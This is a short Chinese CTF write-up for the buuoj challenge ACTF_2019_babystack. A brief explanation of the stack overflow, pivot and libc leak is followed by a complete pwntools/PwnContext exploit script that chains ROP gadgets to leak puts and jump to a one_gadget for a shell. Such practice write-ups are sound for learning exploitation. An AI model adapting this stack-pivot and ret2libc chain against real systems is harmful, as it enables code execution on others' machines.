ACTF_2019_babystack
buuoj刷pwn题之ACTF_2019_babystack
漏洞明显,溢出rop,可溢出16个字节
栈迁移到变量s上,然后leak,onegadget一把梭
#coding=utf8
from PwnContext import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# functions for quick script
s = lambda data :ctx.send(str(data)) #in case that data is an int
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096,timeout=2:ctx.recv(numb, timeout=timeout)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = './ACTF_2019_babystack'
ctx.remote = ('0.0.0.0', 0)
ctx.remote_libc = '../../libc/libc-2.27.so'
ctx.debug_remote_libc = True
rs()
# rs('remote')
# print(ctx.libc.path)
size = 0xe0
start = 0x4008F6
leave_ret = 0x400a18
format_str = 0x400B58
pop_rdi_ret = 0x400ad3
pop_rsi_r15_ret = 0x400ad1
sla('>', str(size))
ru('saved at ')
stack_addr = int(ru('\n'), 16)
leak('stack_addr', stack_addr)
pay = '' # ROP
pay += p64(stack_addr) # rbp
pay += p64(pop_rdi_ret) + p64(ctx.binary.got['puts'])
pay += p64(ctx.binary.plt['puts'])
pay += p64(start)
pay += '\x00' * (size - len(pay) - 0x10) + p64(stack_addr) + p64(leave_ret)
#dbg('b *' + hex(start))
#raw_input()
s(pay)
ru('Byebye~\n')
puts_addr = uu64(ru('\n'))
libc_base = puts_addr - ctx.libc.sym['puts']
onegadget = libc_base + 0x4f322
leak('puts', puts_addr)
leak('libc_base', libc_base)
leak('onegadget', onegadget)
sla('>', str(size))
pay = '\x00' * (size - 8) + p64(onegadget)
s(pay)
irt()